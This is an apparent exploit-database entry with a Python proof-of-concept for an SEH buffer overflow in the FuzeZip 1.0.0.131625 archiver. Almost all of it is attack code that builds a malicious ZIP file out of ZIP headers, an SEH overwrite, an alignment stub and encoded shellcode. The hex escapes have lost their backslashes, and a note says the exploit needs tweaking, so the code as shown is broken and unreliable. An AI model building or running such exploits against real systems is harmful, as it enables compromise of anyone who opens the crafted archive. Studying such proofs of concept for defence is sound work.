FuzeZip 1.0.0.131625 - SEH Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FuzeZip 1.0.0.131625 - SEH Buffer Overflow
# Published : 2013-05-01
# Author :
# Previous Title : AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)
# Next Title : WinArchiver 3.2 - SEH Buffer Overflow

#!/usr/bin/python
# Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0
# Date: 16.Apr.2013 Vulnerability reported
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon
# Organization: RealPentesting 
# Vendor Homepage: http://fuzezip.com/
# Software Link: http://download.fuzezip.com/FuzeZipSetup.exe
# Version: 1.0.0.131625
# Tested on: Windows 2003 Server Standard SP2
# Exploit-DB note: Needs tweaking tho ...

header1 = (
"x50x4Bx03x04x0Ax00x00x00x00x00xE5x18xE9x3E"
"xCCxD4x7Cx56x0Fx00x00x00x0Fx00x00x00xBFx17x00x00"
)

#0x003F 335C

seh = "x9ax9f"
nextsh = "x58x70"

header_m = "x54x68x69x73x20x69x73x20x61x20x74x65x73x74x21x50x4Bx01x02x14x00x0Ax00x00x00x00x00xE5x18xE9x3ExCCxD4x7Cx56x0Fx00x00x00x0Fx00x00x00xBFx17x00x00x00x00x00x00x01x00x20x08x00x00x00x00x00x00"
header_f = "x50x4Bx05x06x00x00x00x00x01x00x01x00xEDx17x00x00xECx17x00x00x00x00"

venetian = (
"x55x55"
"x72"
"x58"
"x72"
"x05x25x11"
"x72"
"x2dx11x11"
)

shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"
)

print len(shellcode)

payload = "x90" * 818 + nextsh + seh + venetian + "x90" * 109 + "x72" + shellcode + "x43" * 4323

buff = payload  
print len(payload)
mefile = open('josep.zip','w')
mefile.write(header1 + buff + header_m + buff + header_f)
mefile.close()